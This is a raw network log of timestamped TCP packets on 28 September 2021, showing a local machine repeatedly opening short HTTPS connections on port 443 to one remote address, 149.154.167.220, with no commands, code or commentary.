Sep 28, 2021 07:58:38.864803076 CEST	443	49857	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.923192024 CEST	443	49857	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.940187931 CEST	49857	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.940218925 CEST	443	49857	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:38.940423012 CEST	49857	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:38.940431118 CEST	443	49857	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.018199921 CEST	443	49857	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.019042015 CEST	443	49857	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.019463062 CEST	49857	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.020176888 CEST	49857	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.023171902 CEST	49858	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.023257017 CEST	443	49858	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.023375988 CEST	49858	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.024024010 CEST	49858	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.024048090 CEST	443	49858	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.083720922 CEST	443	49858	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.089210987 CEST	49858	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.089253902 CEST	443	49858	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.089539051 CEST	49858	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.089556932 CEST	443	49858	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.197935104 CEST	443	49858	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.198033094 CEST	443	49858	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.198163033 CEST	49858	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.199271917 CEST	49858	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.202055931 CEST	49859	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.202097893 CEST	443	49859	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.202223063 CEST	49859	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.202847004 CEST	49859	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.202867985 CEST	443	49859	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.260462046 CEST	443	49859	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.264712095 CEST	49859	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.264745951 CEST	443	49859	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.264991999 CEST	49859	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.265000105 CEST	443	49859	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.368881941 CEST	443	49859	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.368973017 CEST	443	49859	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.369045019 CEST	49859	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.369911909 CEST	49859	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.371551991 CEST	49860	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.371603012 CEST	443	49860	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.371741056 CEST	49860	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.372389078 CEST	49860	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.372414112 CEST	443	49860	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.431663036 CEST	443	49860	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.435698986 CEST	49860	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.435741901 CEST	443	49860	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.435869932 CEST	49860	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.435885906 CEST	443	49860	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.535181999 CEST	443	49860	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.535273075 CEST	443	49860	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.535346031 CEST	49860	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.537601948 CEST	49860	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.539423943 CEST	49861	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.539501905 CEST	443	49861	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.539685011 CEST	49861	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.540582895 CEST	49861	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.540596962 CEST	443	49861	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.597815037 CEST	443	49861	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.601418018 CEST	49861	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.601455927 CEST	443	49861	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.601622105 CEST	49861	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.601633072 CEST	443	49861	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.708822012 CEST	443	49861	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.708937883 CEST	443	49861	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.709005117 CEST	49861	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.709852934 CEST	49861	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.711227894 CEST	49862	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.711266041 CEST	443	49862	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.711348057 CEST	49862	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.711792946 CEST	49862	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.711817026 CEST	443	49862	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.768220901 CEST	443	49862	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.771059036 CEST	49862	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.771095991 CEST	443	49862	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.772763968 CEST	49862	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.772779942 CEST	443	49862	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.874500036 CEST	443	49862	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.874588013 CEST	443	49862	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.874703884 CEST	49862	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.875526905 CEST	49862	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.877410889 CEST	49863	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.877476931 CEST	443	49863	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.877580881 CEST	49863	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.878132105 CEST	49863	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.878159046 CEST	443	49863	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.934170008 CEST	443	49863	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.937223911 CEST	49863	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.937271118 CEST	443	49863	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:39.937349081 CEST	49863	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:39.937359095 CEST	443	49863	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.037102938 CEST	443	49863	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.037477970 CEST	443	49863	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.037647963 CEST	49863	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.038741112 CEST	49863	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.040572882 CEST	49864	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.040637970 CEST	443	49864	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.040762901 CEST	49864	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.041599989 CEST	49864	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.041632891 CEST	443	49864	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.097796917 CEST	443	49864	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.101663113 CEST	49864	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.101716042 CEST	443	49864	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.102196932 CEST	49864	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.102219105 CEST	443	49864	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.195400953 CEST	443	49864	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.195523977 CEST	443	49864	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.195596933 CEST	49864	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.196647882 CEST	49864	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.198657990 CEST	49865	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.198715925 CEST	443	49865	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.198848963 CEST	49865	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.199697971 CEST	49865	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.199732065 CEST	443	49865	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.256964922 CEST	443	49865	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.261358023 CEST	49865	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.261389971 CEST	443	49865	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.261620998 CEST	49865	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.261630058 CEST	443	49865	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.431627989 CEST	443	49865	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.431715012 CEST	443	49865	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.431946039 CEST	49865	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.433367968 CEST	49865	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.435621977 CEST	49866	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.435677052 CEST	443	49866	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.435791016 CEST	49866	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.436428070 CEST	49866	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.436454058 CEST	443	49866	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.493367910 CEST	443	49866	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.499737024 CEST	49866	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.499798059 CEST	443	49866	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.499943018 CEST	49866	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.499964952 CEST	443	49866	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.619452000 CEST	443	49866	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.619538069 CEST	443	49866	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.619858027 CEST	49866	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.620836973 CEST	49866	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.622950077 CEST	49867	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.623004913 CEST	443	49867	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.623136997 CEST	49867	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.623713017 CEST	49867	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.623742104 CEST	443	49867	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.680438042 CEST	443	49867	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.687771082 CEST	49867	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.687819958 CEST	443	49867	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.687993050 CEST	49867	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.688011885 CEST	443	49867	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.784982920 CEST	443	49867	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.785073996 CEST	443	49867	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.785200119 CEST	49867	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.786147118 CEST	49867	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.787604094 CEST	49868	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.787647963 CEST	443	49868	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.787748098 CEST	49868	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.788171053 CEST	49868	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.788184881 CEST	443	49868	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.845346928 CEST	443	49868	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.850857019 CEST	49868	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.850887060 CEST	443	49868	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.851229906 CEST	49868	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.851243973 CEST	443	49868	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.946630001 CEST	443	49868	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.946719885 CEST	443	49868	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.946830988 CEST	49868	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.947926044 CEST	49868	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.949923992 CEST	49869	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.949971914 CEST	443	49869	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:40.950079918 CEST	49869	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.950624943 CEST	49869	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:40.950642109 CEST	443	49869	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.007414103 CEST	443	49869	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.012823105 CEST	49869	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.012868881 CEST	443	49869	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.012989998 CEST	49869	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.013006926 CEST	443	49869	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.125539064 CEST	443	49869	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.125633001 CEST	443	49869	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.126943111 CEST	49869	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.129631042 CEST	49870	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.129690886 CEST	443	49870	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.129808903 CEST	49870	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.130393982 CEST	49870	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.130413055 CEST	443	49870	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.131508112 CEST	49869	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.188323975 CEST	443	49870	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.193705082 CEST	49870	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.193747997 CEST	443	49870	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.193887949 CEST	49870	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.193903923 CEST	443	49870	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.590958118 CEST	443	49870	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.591031075 CEST	443	49870	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.591223955 CEST	49870	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.592251062 CEST	49870	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.594264984 CEST	49871	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.594301939 CEST	443	49871	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.594413042 CEST	49871	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.594945908 CEST	49871	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.594965935 CEST	443	49871	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.654699087 CEST	443	49871	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.658608913 CEST	49871	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.658636093 CEST	443	49871	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.658734083 CEST	49871	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.658742905 CEST	443	49871	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.762178898 CEST	443	49871	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.762265921 CEST	443	49871	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.762341022 CEST	49871	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.763380051 CEST	49871	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.765074015 CEST	49872	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.765120029 CEST	443	49872	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.765201092 CEST	49872	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.765619040 CEST	49872	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.765635967 CEST	443	49872	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.824084997 CEST	443	49872	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.827626944 CEST	49872	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.827686071 CEST	443	49872	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.827750921 CEST	49872	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.827758074 CEST	443	49872	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.964696884 CEST	443	49872	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.964795113 CEST	443	49872	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.964874029 CEST	49872	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.965861082 CEST	49872	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.967706919 CEST	49873	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.967746973 CEST	443	49873	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:41.967830896 CEST	49873	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.968339920 CEST	49873	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:41.968358040 CEST	443	49873	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.031377077 CEST	443	49873	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.035320044 CEST	49873	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.035351992 CEST	443	49873	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.035506964 CEST	49873	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.035517931 CEST	443	49873	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.210167885 CEST	443	49873	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.210360050 CEST	443	49873	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.210484982 CEST	49873	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.212891102 CEST	49873	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.215429068 CEST	49874	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.215465069 CEST	443	49874	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.215614080 CEST	49874	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.216392994 CEST	49874	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.216403961 CEST	443	49874	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.273731947 CEST	443	49874	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.281012058 CEST	49874	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.281050920 CEST	443	49874	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.281169891 CEST	49874	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.281182051 CEST	443	49874	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.379491091 CEST	443	49874	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.379575968 CEST	443	49874	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.379667044 CEST	49874	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.380657911 CEST	49874	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.382522106 CEST	49875	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.382567883 CEST	443	49875	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.382695913 CEST	49875	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.383239985 CEST	49875	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.383255959 CEST	443	49875	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.440134048 CEST	443	49875	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.444015980 CEST	49875	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.444040060 CEST	443	49875	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.444188118 CEST	49875	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.444195032 CEST	443	49875	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.582037926 CEST	443	49875	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.582123041 CEST	443	49875	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.582187891 CEST	49875	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.583168030 CEST	49875	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.586065054 CEST	49876	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.586117983 CEST	443	49876	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.586566925 CEST	49876	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.600883961 CEST	49876	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.600910902 CEST	443	49876	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.658473015 CEST	443	49876	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.663767099 CEST	49876	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.663803101 CEST	443	49876	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.664092064 CEST	49876	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.664232969 CEST	443	49876	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.821958065 CEST	443	49876	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.822052956 CEST	443	49876	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.822137117 CEST	49876	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.823241949 CEST	49876	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.825246096 CEST	49877	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.825290918 CEST	443	49877	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.825402975 CEST	49877	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.826096058 CEST	49877	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.826109886 CEST	443	49877	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.887305021 CEST	443	49877	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.891693115 CEST	49877	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.891721010 CEST	443	49877	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.891870975 CEST	49877	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.891877890 CEST	443	49877	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.993818998 CEST	443	49877	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.993916988 CEST	443	49877	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.993987083 CEST	49877	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.995496988 CEST	49877	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.997544050 CEST	49878	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.997596025 CEST	443	49878	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:42.997710943 CEST	49878	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.998300076 CEST	49878	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:42.998321056 CEST	443	49878	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.056525946 CEST	443	49878	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.060517073 CEST	49878	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.060559988 CEST	443	49878	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.060713053 CEST	49878	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.060724974 CEST	443	49878	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.167258978 CEST	443	49878	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.167365074 CEST	443	49878	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.167463064 CEST	49878	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.168549061 CEST	49878	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.170629978 CEST	49879	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.170670033 CEST	443	49879	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.170787096 CEST	49879	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.171331882 CEST	49879	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.171350002 CEST	443	49879	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.228878975 CEST	443	49879	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.232568026 CEST	49879	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.232595921 CEST	443	49879	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.232734919 CEST	49879	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.232754946 CEST	443	49879	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.400409937 CEST	443	49879	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.400505066 CEST	443	49879	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.400573015 CEST	49879	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.401705027 CEST	49879	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.403669119 CEST	49880	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.403712988 CEST	443	49880	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.403827906 CEST	49880	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.404417038 CEST	49880	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.404437065 CEST	443	49880	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.461186886 CEST	443	49880	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.465301037 CEST	49880	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.465332985 CEST	443	49880	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.465476990 CEST	49880	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.465486050 CEST	443	49880	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.707079887 CEST	443	49880	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.707180023 CEST	443	49880	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:43.707325935 CEST	49880	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.708483934 CEST	49880	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:43.710525990 CEST	49881	443	192.168.2.4	149.154.167.220
